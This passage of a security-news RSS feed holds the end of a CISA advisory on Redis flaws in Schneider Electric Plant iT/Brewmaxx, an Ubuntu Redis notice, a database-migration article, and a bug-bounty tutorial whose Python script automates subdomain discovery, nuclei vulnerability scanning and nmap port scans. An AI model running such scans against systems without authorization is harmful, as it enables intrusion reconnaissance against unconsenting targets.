<p><strong>Mitigation</strong><br>After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality</p>
<p><strong>Mitigation</strong><br>Force usage of secure Redis configuration templates in system settings as documented in the patch manual</p>
<p><strong>Mitigation</strong><br>Restart all patched servers and workstations</p>
<p><strong>Mitigation</strong><br>Schneider Electric strongly recommends the following industry cybersecurity best practices.</p>
<p><strong>Mitigation</strong><br>Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.</p>
<p><strong>Mitigation</strong><br>Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.</p>
<p><strong>Mitigation</strong><br>Place all controllers in locked cabinets and never leave them in the "Program" mode.</p>
<p><strong>Mitigation</strong><br>Never connect programming software to any network other than the network intended for that device.</p>
<p><strong>Mitigation</strong><br>Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.</p>
<p><strong>Mitigation</strong><br>Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.</p>
<p><strong>Mitigation</strong><br>Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.</p>
<p><strong>Mitigation</strong><br>When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.</p>
<p><strong>Mitigation</strong><br>For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.<br><a href="https://www.se.com/us/en/download/document/7EN52-0390/">https://www.se.com/us/en/download/document/7EN52-0390/</a></p>
<p><strong>Vendor fix</strong><br>For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx"<br><a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf">https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/94.html">CWE-94 Improper Control of Generation of Code ('Code Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46819</a></h3>
<div class="csaf-accordion-content">
<p>The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted LUA script to read out-of-bound data or crash the server and subsequent denial of service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46819">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric Plant iT/Brewmaxx</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>Schneider Electric Plant iT/Brewmaxx: 9.60_and_above</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit:</p>
<p><strong>Mitigation</strong><br>Install Patch ProLeiT-2025-001 via ProLeiT Support<br><a href="https://www.proleit.com/support/">https://www.proleit.com/support/</a></p>
<p><strong>Mitigation</strong><br>After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality</p>
<p><strong>Mitigation</strong><br>Force usage of secure Redis configuration templates in system settings as documented in the patch manual</p>
<p><strong>Mitigation</strong><br>Restart all patched servers and workstations</p>
<p><strong>Mitigation</strong><br>Schneider Electric strongly recommends the following industry cybersecurity best practices.</p>
<p><strong>Mitigation</strong><br>Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.</p>
<p><strong>Mitigation</strong><br>Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.</p>
<p><strong>Mitigation</strong><br>Place all controllers in locked cabinets and never leave them in the "Program" mode.</p>
<p><strong>Mitigation</strong><br>Never connect programming software to any network other than the network intended for that device.</p>
<p><strong>Mitigation</strong><br>Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.</p>
<p><strong>Mitigation</strong><br>Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.</p>
<p><strong>Mitigation</strong><br>Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.</p>
<p><strong>Mitigation</strong><br>When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.</p>
<p><strong>Mitigation</strong><br>For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.<br><a href="https://www.se.com/us/en/download/document/7EN52-0390/">https://www.se.com/us/en/download/document/7EN52-0390/</a></p>
<p><strong>Vendor fix</strong><br>For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx"<br><a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf">https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Schneider Electric reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-03-24</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-03-24</td>
<td>1</td>
<td>Initial Republication of SEVD-2026-013-01</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8120-1: Redis vulnerability]]></title>
<description><![CDATA[Seunghyun Lee discovered that Redis incorrectly handled memory during
hyperloglog operations. An attacker could use this issue to cause a denial
of service, or possibly achieve remote code execution.]]></description>
<link>https://tsecurity.de/de/3377236/unix-server/usn-8120-1-redis-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3377236/unix-server/usn-8120-1-redis-vulnerability/</guid>
<pubDate>Tue, 24 Mar 2026 16:30:37 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seunghyun Lee discovered that Redis incorrectly handled memory during
hyperloglog operations. An attacker could use this issue to cause a denial
of service, or possibly achieve remote code execution.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Set Up a Bug Bounty Recon Automation with Python & Nuclei]]></title>
<description><![CDATA[Stop doing recon manually. Let your machine find bugs while you sleep.I used to spend 4–5 hours manually doing recon on every target.Subdomain enumeration. Port scanning. Vulnerability checking. Directory bruteforcing. It was repetitive, slow, and exhausting.Then I automated it.Now I run one scri...]]></description>
<link>https://tsecurity.de/de/3365749/hacking/how-to-set-up-a-bug-bounty-recon-automation-with-python-nuclei/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365749/hacking/how-to-set-up-a-bug-bounty-recon-automation-with-python-nuclei/</guid>
<pubDate>Fri, 20 Mar 2026 06:35:07 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*F1dK7PKJphNO2-vpUHfSGQ.png"></figure><p><em>Stop doing recon manually. Let your machine find bugs while you sleep.</em></p><p>I used to spend 4–5 hours manually doing recon on every target.</p><p>Subdomain enumeration. Port scanning. Vulnerability checking. Directory bruteforcing. It was repetitive, slow, and exhausting.</p><p>Then I automated it.</p><p>Now I run one script before bed and wake up to a report of potential vulnerabilities. This article shows you exactly how I built that system — and how you can copy it for your own bug bounty workflow.</p><h3>What Is Recon and Why Automate It?</h3><p>Recon (reconnaissance) is the first step in bug bounty hunting. Before you can find vulnerabilities, you need to map the target:</p><ul><li>What subdomains exist?</li><li>What ports are open?</li><li>What technologies are running?</li><li>What known vulnerabilities exist on those technologies?</li></ul><p>Doing this manually for every target is a waste of your most valuable resource <strong>time.</strong></p><p>Automation solves this. You define the logic once, and the machine runs it thousands of times faster than you ever could.</p><h3>Tools We’ll Use</h3><p><strong>Subfinder </strong>Subdomain discovery</p><p>go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest</p><p><strong>Httpx </strong>HTTP probing (live hosts)</p><p>go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest</p><p><strong>Nuclei </strong>Vulnerability scanning</p><p>go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest</p><p><strong>Nmap </strong>Port scanning</p><p>sudo apt install nmap</p><p><strong>Python 3 </strong>Glue everything together</p><p>Pre-installed on Kali Linux</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/728/1*5W-AwCcryMvuRK6d-kAirg.png"></figure><p>All tools are free and open source. Install Go first if you haven’t:</p><pre>sudo apt install golang-g</pre><h3>The Recon Automation Script</h3><p>Here is the full Python script. Save it as recon.py:</p><pre>import subprocess<br>import os<br>import sys<br>import datetime<br><br>def banner():<br>    print("""<br>    ██████╗ ███████╗ ██████╗ ██████╗ ███╗   ██╗<br>    ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗  ██║<br>    ██████╔╝█████╗  ██║     ██║   ██║██╔██╗ ██║<br>    ██╔══██╗██╔══╝  ██║     ██║   ██║██║╚██╗██║<br>    ██║  ██║███████╗╚██████╗╚██████╔╝██║ ╚████║<br>    ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝<br>    Bug Bounty Recon Automation - by @HackerMD<br>    """)<br>def create_output_dir(domain):<br>    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")<br>    output_dir = f"recon_{domain}_{timestamp}"<br>    os.makedirs(output_dir, exist_ok=True)<br>    return output_dir<br>def run_subfinder(domain, output_dir):<br>    print(f"\n[*] Running Subfinder on {domain}...")<br>    output_file = f"{output_dir}/subdomains.txt"<br>    cmd = f"subfinder -d {domain} -silent -o {output_file}"<br>    subprocess.run(cmd, shell=True)<br>    print(f"[+] Subdomains saved to {output_file}")<br>    return output_file<br>def run_httpx(subdomains_file, output_dir):<br>    print("\n[*] Probing for live hosts with Httpx...")<br>    output_file = f"{output_dir}/live_hosts.txt"<br>    cmd = f"httpx -l {subdomains_file} -silent -o {output_file} -status-code -title -tech-detect"<br>    subprocess.run(cmd, shell=True)<br>    print(f"[+] Live hosts saved to {output_file}")<br>    return output_file<br>def run_nuclei(live_hosts_file, output_dir):<br>    print("\n[*] Running Nuclei vulnerability scan...")<br>    output_file = f"{output_dir}/nuclei_results.txt"<br>    cmd = f"nuclei -l {live_hosts_file} -severity critical,high,medium -o {output_file} -silent"<br>    subprocess.run(cmd, shell=True)<br>    print(f"[+] Nuclei results saved to {output_file}")<br>    return output_file<br>def run_nmap(domain, output_dir):<br>    print(f"\n[*] Running Nmap port scan on {domain}...")<br>    output_file = f"{output_dir}/nmap_results.txt"<br>    cmd = f"nmap -sV --top-ports 1000 {domain} -oN {output_file}"<br>    subprocess.run(cmd, shell=True)<br>    print(f"[+] Nmap results saved to {output_file}")<br>def generate_report(domain, output_dir):<br>    print("\n[*] Generating final report...")<br>    report_file = f"{output_dir}/REPORT_{domain}.txt"<br>    with open(report_file, "w") as report:<br>        report.write(f"=== BUG BOUNTY RECON REPORT ===\n")<br>        report.write(f"Target: {domain}\n")<br>        report.write(f"Date: {datetime.datetime.now()}\n")<br>        report.write(f"Tool: @HackerMD Recon Automation\n\n")<br>        for filename in os.listdir(output_dir):<br>            filepath = os.path.join(output_dir, filename)<br>            if filename.endswith(".txt") and filename != f"REPORT_{domain}.txt":<br>                report.write(f"\n{'='*50}\n")<br>                report.write(f"[{filename}]\n")<br>                report.write(f"{'='*50}\n")<br>                with open(filepath, "r") as f:<br>                    report.write(f.read())<br>    print(f"\n[✓] Report generated: {report_file}")<br>    print(f"[✓] All files saved in: {output_dir}/\n")<br>def main():<br>    banner()<br>    if len(sys.argv) != 2:<br>        print("Usage: python3 recon.py &lt;target-domain&gt;")<br>        print("Example: python3 recon.py example.com")<br>        sys.exit(1)<br>    domain = sys.argv[1]<br>    output_dir = create_output_dir(domain)<br>    print(f"[+] Target: {domain}")<br>    print(f"[+] Output Directory: {output_dir}")<br>    subdomains_file = run_subfinder(domain, output_dir)<br>    live_hosts_file = run_httpx(subdomains_file, output_dir)<br>    run_nuclei(live_hosts_file, output_dir)<br>    run_nmap(domain, output_dir)<br>    generate_report(domain, output_dir)<br>if __name__ == "__main__":<br>    main()</pre><h3>How to Run It</h3><pre># Save the script<br>nano recon.py<br># Make it executable<br>chmod +x recon.py<br># Run against a target (only on programs you have permission for!)<br>python3 recon.py targetdomain.com</pre><p><strong>Output you’ll get:</strong></p><pre>recon_targetdomain.com_20260225_210000/<br>├── subdomains.txt       ← All discovered subdomains<br>├── live_hosts.txt       ← Only live/active hosts<br>├── nuclei_results.txt   ← Vulnerability scan results<br>├── nmap_results.txt     ← Open ports &amp; services<br>└── REPORT_targetdomain.txt ← Full combined report</pre><h3>Understanding Each Step</h3><h3>Step 1 Subfinder</h3><p>Subfinder queries over 50 passive DNS sources simultaneously — Shodan, VirusTotal, CertSpotter, and more. A target like example.com might have 500+ subdomains that are invisible to normal browsing. Many of these subdomains have <strong>older, forgotten, vulnerable services</strong> running on them — these are goldmines for bug hunters.</p><h3>Step 2 Httpx</h3><p>Out of 500 subdomains, maybe only 200 are actually live. Httpx filters these out quickly, shows you their HTTP status codes, page titles, and what technologies they’re running (Apache, Nginx, WordPress, etc.). Tech detection alone can tell you which exploits to try.</p><h3>Step 3 Nuclei</h3><p>This is where the magic happens. Nuclei has <strong>9,000+ vulnerability templates</strong> maintained by the ProjectDiscovery team. It checks for:</p><ul><li>Exposed admin panels</li><li>Default credentials</li><li>CVEs in detected technologies</li><li>Misconfigurations</li><li>Exposed sensitive files (.env, .git, backup files)</li><li>SSRF, XSS, SQLi patterns</li></ul><p><strong>One Nuclei scan can surface findings that would take hours to find manually.</strong></p><h3>Step 4 Nmap</h3><p>Port scanning reveals services running outside port 80/443. An FTP server on port 21, a Redis instance on 6379, or an exposed Elasticsearch on 9200 — these are all potential critical findings.</p><h3>Advanced: Adding Waybackurls for Historical Recon</h3><p>Want to find even more attack surface? Add historical URL discovery:</p><pre>pip install waybackpy</pre><p>Add this function to the script:</p><pre>def run_wayback(domain, output_dir):<br>    print(f"\n[*] Fetching historical URLs from Wayback Machine...")<br>    output_file = f"{output_dir}/wayback_urls.txt"<br>    cmd = f"echo {domain} | waybackurls &gt; {output_file}"<br>    subprocess.run(cmd, shell=True)<br>    print(f"[+] Historical URLs saved to {output_file}")</pre><p>Historical URLs often reveal <strong>forgotten endpoints</strong> — old API versions, backup pages, internal paths — that developers forgot to secure.</p><h3>Important Rules — Read This</h3><p>Before you run this on any target:</p><ol><li><strong>Only scan programs you are authorized to test</strong> — HackerOne, Bugcrowd, or explicit written permission</li><li><strong>Never scan government or critical infrastructure</strong></li><li><strong>Rate limit your scans</strong> — Add -rate-limit 100 to Nuclei to avoid overwhelming servers</li><li><strong>Check the program’s scope</strong> — Some programs exclude specific subdomains</li></ol><p>Running unauthorized scans is illegal. Stick to your authorized scope — always.</p><h3>Real Results From My Workflow</h3><p>Using this exact automation pipeline, I have found:</p><ul><li><strong>Exposed .env files</strong> containing database credentials — High severity</li><li><strong>Default admin credentials</strong> on forgotten subdomains — Critical</li><li><strong>Outdated Apache versions</strong> with known CVEs — Medium/High</li><li><strong>Open redirect vulnerabilities</strong> via Nuclei templates — Low/Medium</li></ul><p>Not every scan returns critical findings — but consistency pays off. Run this against 10 targets and you will find something reportable.</p><h3>What to Do When Nuclei Finds Something</h3><ol><li><strong>Verify manually</strong> — Always confirm the finding is real, not a false positive</li><li><strong>Document everything</strong> — Screenshot, request/response, impact explanation</li><li><strong>Write a clear report</strong> — Title, severity, steps to reproduce, impact, remediation</li><li><strong>Submit to the program</strong> — Bugcrowd, HackerOne, or the program’s VDP</li></ol><p>The automation finds the lead. <em>You</em> close the deal with a good report.</p><h3>Final Thoughts</h3><p>Manual recon is dead for serious bug hunters. The hunters who are consistently earning are the ones who built systems that work while they sleep.</p><p>This script is your starting point. Customize it, add more tools, improve the report format, add Slack/email notifications for critical findings.</p><p>The best recon pipeline is the one you build yourself — because you understand every line of it.</p><p>Now go automate. 🐛</p><p><em>I’m </em><strong><em>@HackerMD</em></strong><em> — a cybersecurity researcher and bug bounty hunter from India. Follow me for more practical security content, real writeups, and automation scripts.</em></p><p>#BugBounty #Hacking #Cybersecurity #Hacking #Infosec</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d120ee608b3" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-to-set-up-a-bug-bounty-recon-automation-with-python-nuclei-5d120ee608b3">How to Set Up a Bug Bounty Recon Automation with Python &amp; Nuclei</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Update your databases now to avoid data debt]]></title>
<description><![CDATA[2026 should be a year of database updates, upgrades, and migrations. Across all of the most commonly used open source databases, end-of-life dates are forcing teams to take stock and move their workloads. The alternative is to stick with what is in place. While staying put might work in the short...]]></description>
<link>https://tsecurity.de/de/3365077/ai-nachrichten/update-your-databases-now-to-avoid-data-debt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365077/ai-nachrichten/update-your-databases-now-to-avoid-data-debt/</guid>
<pubDate>Fri, 20 Mar 2026 04:27:49 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>2026 should be a year of database updates, upgrades, and migrations. Across all of the most commonly used open source databases, end-of-life dates are forcing teams to take stock and move their workloads. The alternative is to stick with what is in place. While staying put might work in the short term, it will lead to more problems and higher costs over time. At the same time, moving too quickly has its own risks and potential challenges. How can we get things just right for you and your team?</p>



<h2 class="wp-block-heading">Database dates for your diary</h2>



<p>If you use MySQL, then there is a major date to plan ahead for. On April 30, 2026, MySQL 8.0 will reach <a href="https://endoflife.date/mysql">End of Life</a> (EOL) status. As a Long Term Support release, MySQL 8.0 is at the heart of many applications, so there should be a lot of planning completed already around moving to new systems. For those of you running PostgreSQL, version 13 is already End of Life, and version 14 will move to EOL status when version 19 of PostgreSQL is released in September 2026. Redis will see <a href="https://redis.io/docs/latest/operate/rs/installing-upgrading/product-lifecycle/">two end-of-life dates</a> in 2026, with 7.2 going EOL in February 2026 and 7.4 in November. Outside open source, MongoDB 6.0 will reach <a href="https://www.mongodb.com/legal/support-policy/lifecycles">EoL status</a> in June 2026.</p>



<p>For teams running any of these databases, planning ahead around updates will involve a lot of work. For teams that follow a best-of-breed approach and use multiple databases in their stacks for different workloads, the challenge is even greater. Any migration should ideally start at least six months early to allow enough time for testing, compatibility checks, and successful cut-overs in advance of any end-of-life date. Yet the world of IT is rarely ideal; these applications might be critical to the business, leading to compressed timelines or even projects being postponed repeatedly. In a world where “if it’s not broken, don’t try to fix it” is often sage advice, a database migration might be seen as a lot of work for very little reward and high risk when things don’t go according to plan.</p>



<p>So what can teams do to get ahead of these projects and the potential problems that can come up?</p>



<h2 class="wp-block-heading">Planning the move</h2>



<p>The first place to start is knowing all of the database systems that are in place. This can be across test, development, and production instances, and across database versions. There might be multiple versions of one database, or versions of the different databases that are implemented. Either way, making an accurate list of what is implemented is essential. Even if you run your databases in the cloud using a managed service, those databases will be a specific version and will need to be updated over time.</p>



<p>Once you have that list of database instances and versions, you can decide if and when they should be updated. Test and development instances can be moved sooner, while production deployments can be moved once the database is proven to be as resilient and reliable as the existing versions. Everyone in IT is familiar with the rule of not implementing a version of software that is *.0, and waiting for the inevitable bugs or deployment problems to be patched. For production environments that have to deliver to service levels, that move will take some additional time.</p>



<p>You may also want to estimate the time frame for your project. Critical applications will need more careful planning and testing before they get shifted, while less important ones might need less time. Similarly, critical applications might have more complex deployments like sharded databases or clustering for availability. Updating a distributed database is harder and will take more time than a single-server deployment. </p>



<p>However complex your environment is, try creating a standard estimate for projects. An estimate will give you some internal deadlines for those projects based on your understanding of complexity, deployment type, and, most important of all, how critical the application is to the business. This will help you plan not only the migrations, but also your communications around the moves and the potential impacts they might have on the business. For truly mission-critical applications, this timeline might have to extend to twelve months.</p>



<p>Once you are ready to commit to a move, you should measure your performance today before any changes are made. This gives you a benchmark for your existing systems and a picture of what “good” looks like. Without this measurement, you will not be able to determine how successful the move has been. Even for end-of-life software migrations, businesses expect to see some form of return on their investment, and a performance boost from a move can count towards that return.</p>



<p>The details of the migration will depend on your database and how it handles the move. Some updates will be simple and can be carried out in place, while others will be more complex and contrite. The most serious are those where there is no simple rollback process; in effect, once you migrate, there is no route back. For these situations, restoring a backup may be the only recourse. Similarly, a restoration may be in order if you have a problem with performance.</p>



<p>Alongside the database itself, you will have to look at the overall application environment as well. Any change to the database can have a knock-on effect on the application developers, and on the line-of-business team responsible for the service. Implementing a test environment for the updated database for compatibility testing will help you ensure proper behavior and functionality. Alongside this test, you should also look at your documentation, so you can plan your architectural changes and ensure you have fully described your production implementation, rather than just thinking you have described it.</p>



<h2 class="wp-block-heading">Potential challenges</h2>



<p>The biggest challenge around database migrations is getting people on board with the project. To make it easier to get support, it’s important to look beyond the EOL date. Instead, look at the benefits that a change can deliver around performance or ease of use. These improvements might seem small, but they can quickly add up to real business value.</p>



<p>The next biggest challenge in any database migration is getting things to work as expected. You may find edge scenarios that use areas of your database that have changed and that were outside your initial testing and planning. Those functions then have to be updated and implemented, with the same attention to detail that they might have needed before the move.</p>



<p>To make all this work successfully, you should put together a budget for the migration project. This budget should cover any additional personnel costs to include what is needed during the move, as well as the cost of the hardware or any additional resources. Whatever you might have estimated, you may face additional expenses when those extra requirements crop up or unplanned extras need support. Such contingencies must be planned for, or you risk the migration failing as a whole.</p>



<p>How you communicate around a migration project can make a huge difference to its success or failure. Your communications plan should cover those directly involved, like the developers and infrastructure managers, through to those who own the application within the business. Each of these groups may be affected by the migration, and must be made aware of the issues and pain points that may come up. By agreeing communication paths ahead of the move, you make it more likely that you can work together effectively around the whole project.</p>



<p>In 2026—and beyond—database migrations will demand time, effort, and attention from developers and infrastructure teams. To make those migrations effective, planning ahead around end-of-life scenarios will involve preparation, testing, and measurement. Working back from those deadlines will help you prepare more effectively and make the business case to move at the right speed for your team, rather than leaving things to the last minute. The goal here is to reach the <a href="https://science.nasa.gov/exoplanets/what-is-the-habitable-zone-or-goldilocks-zone/">Goldilocks zone</a>, where migrations are not too fast or too slow, but just right for the business.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Experimental allocator for network heavy workloads (possibly others) in Rust (no_std).]]></title>
<description><![CDATA[After seeing a post on Hacker News yesterday about allocators, I figured I'd pick up on this project again. My use case is networking based, eg. routing, firewall, etc. And mainly learning. Design Goals   Minimize application core latency: Push metadata operations to support core Hardware acceler...]]></description>
<link>https://tsecurity.de/de/3357790/linux-tipps/experimental-allocator-for-network-heavy-workloads-possibly-others-in-rust-nostd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3357790/linux-tipps/experimental-allocator-for-network-heavy-workloads-possibly-others-in-rust-nostd/</guid>
<pubDate>Wed, 18 Mar 2026 02:50:22 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>After seeing a post on Hacker News yesterday about allocators, I figured I'd pick up on this project again.</p> <p>My use case is networking based, eg. routing, firewall, etc. And mainly learning.</p> <p>Design Goals</p> <p><a href="https://github.com/shift/aethalloc#design-goals"></a></p> <ol> <li><strong>Minimize application core latency</strong>: Push metadata operations to support core</li> <li><strong>Hardware acceleration</strong>: Use CPU tagging features when available</li> <li><strong>Memory compaction</strong>: Reduce fragmentation via page migration</li> <li><strong>No_std compatible</strong>: Works in freestanding environments</li> </ol> <p><strong>Recommended for:</strong></p> <ul> <li>Memory-constrained environments (uses 11x less memory in fragmentation workloads)</li> <li>Network packet processing (6% faster than glibc)</li> <li>KV-store / cache workloads (13% faster than glibc)</li> <li>Single-threaded or low-contention scenarios</li> </ul> <p><strong>Not recommended for:</strong></p> <ul> <li>High thread contention (&gt;4 threads with heavy allocation churn)</li> <li>Workloads dominated by large allocations (&gt;64KB)</li> <li>Sequential allocation patterns where glibc's slab is optimized</li> </ul> <p>AethAlloc achieves parity or better with glibc in key workloads while using significantly less memory in fragmentation-heavy scenarios.</p> <table><thead> <tr> <th align="left">Benchmark</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> <th align="left">Ratio</th> <th align="left">Winner</th> </tr> </thead><tbody> <tr> <td align="left">Packet Churn</td> <td align="left">186K ops/s</td> <td align="left">198K ops/s</td> <td align="left">106%</td> <td align="left">AethAlloc</td> </tr> <tr> <td align="left">KV Store</td> <td align="left">260K ops/s</td> <td 